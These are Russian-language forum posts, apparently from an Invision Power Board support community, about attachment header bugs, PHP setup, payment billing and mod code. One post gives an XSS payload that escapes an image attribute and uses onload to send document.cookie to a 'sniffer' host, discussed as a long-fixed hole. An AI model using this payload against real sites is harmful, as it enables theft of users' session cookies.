Anna

Ух ты, здорово Идея-то живет Спасибо

Помогите пожалуйста с вложениями - у меня следующая проблема. После переноса проекта на другой хостинг, у меня при клике на эскиз, выдается не картинка, а белеберда двоичная. Можно нажимать "сохранить ссылку как" и тогда сохраненный файл просматривается как картинка, но при обычном клике на эскиз - полная фигня, как будто head не работает... Но ничего не меняла в коде... В чем может быть дело? UPDATE Вот если убрать экранирование с того самого head,то наверху этой белеберды выдается: IPB Предупреждение [2] Header may not contain more than a single header, new line detected. (Строка: 241 файла /sources/misc/attach.php) UPDATE хидер выглядит следующим образом: Content-Type: image/jpeg Content-Disposition: inline; filename="group.jpg" Content-Length: 35830 UPDATE Решение найдено Может кому пригодится. Не знаю в чем конкретно был глюк, но вот так работает (misc/attach.php) /* @header( "Content-Type: ".$ibforums->cache['attachtypes'][ $attach['attach_ext'] ]['atype_mimetype']. "\nContent-Disposition: inline; filename=\"".$attach['attach_file'] ."\"\nContent-Length: ".(string)(filesize( $file ) ) ); */ @header( "Content-Type: ".$ibforums->cache['attachtypes'][ $attach['attach_ext'] ]['atype_mimetype'] ); @header( "Content-Disposition: inline; filename=\"".$attach['attach_file']."\"" ); @header( "Content-Length: ".(string)(filesize( $file ) ) );

Вобще, у меня на 2.0 я посмотрела подобная дырка была закрыта черт знает когда (обратите внимание на дату когда я это фиксила): // security change 24.07.05 //$old_title = preg_replace( "/'/", "'", $std->txt_stripslashes($_POST['msg_title']) ); $old_title = $std->txt_htmlspecialchars($std->txt_stripslashes($_POST['msg_title']) ); //^^ в 2.0 - это /lib/msg_functions.php

У тебя недоделанный php-интерпритатор. Не установлен компонент PHP-GD. Если сервак свой - переустанови пхп с этим компонентом. Если не свой - см на сайте мастерхоста статью о том как собрать свой пхп, там указана строка компиляции вместе с данным компонентом: http://masterhost.ru/support/doc/php/#compile П.С. Чтобы собрать пхп надо доступ в unix shell П.П.С. для скачки последнего дистрибутива (на сегодня) использовать команду: wget http://www.php.net/get/php-4.4.3.tar.bz2/from/this/mirror потому что в статье указана старая ссылка на версию 4.3.11

Нет, извините, но я если что-то пишу то только под 2.0.х.

Ну это временное явление. Ну я ж не говорю что это единственное решение. Вот пожалуйста рупэй - отличный вариант, даже ibresource.ru использует их биллинг.

Есть готовое решение с sms-копилками Там выгрузка биллинга идет в XML и на сайте выложен парсер, который биллинговый дамп всасывает и может совершать соответствующие действия. Чтобы реализовать любой аналогичный механизм, необходимо, чтобы сайт вебманей или яндекса выдавал по определенному запросу биллинговый дамп, т.е. таблицу в которой содержались бы сведения о денежных транзакциях твоего счета. Оно есть? Не, есть конечно еще один вариант - завяжись с RU_PAY. Пусть юзеры платят не напрямую вебманями и ядекс-деньгами, а через рупэй. Это будет чуть дольше, но рупей за скромное вознаграждение возьмет на себя весь биллинг и будет предоставлять тебе соответствующие дампы. Вся система описана на их сайте. там надо зергиться, зайти в раздел для продавцов, а затем установить специальный код на своей странице.

Весьма интересно, насколько реальна угроза от подобного куска кода и возможность его внедрения. OnLoad опасная штука. Нет, такой вариант в инвижне давно уже не прокатывает. Дырку в теге IMG закрыли сто лет назад еще в первой линейке кажется (когда кавычка пропускалась в урл картинки). Я просто привела пример того, что по сути не всегда нужно слово "javascript" для выполнения инъекции. Извините, если не в тему. П.С. onload работает только если у юзера включены в браузере картинки и яваскрипт.

Как показала практика, использование слова javascript не обязательно. Достаточно внедрить картинку, выйти за ее кавычку, а там написать onload="this.src='снифер'+document.cookie и усе....

А где можно прочитать про такого бота, который якобы может разобрать стандартный код безопаности IPB ?

Да, вам - про 1.3.х. Потому что под 2.1.х надо стопудово переписывать использование классов (ipsclass делать)

К сожалению я не знакома с модом автоматического снятия предупреждений, но по смыслу должно быть так: SELECT wlog_weight FROM ibf_warn_logs WHERE wlog_id = 'сюда_индекс_предупреждения'; а потом это значение пишешь в переменную и подставляешь в свой запрос на снятие предупреждения так, чтоб оно попало в поле wlog_weight

Гениально! Вот и пришел конец SecurityLab : Arhar придумал универсальный метод защиты от SQL интъекций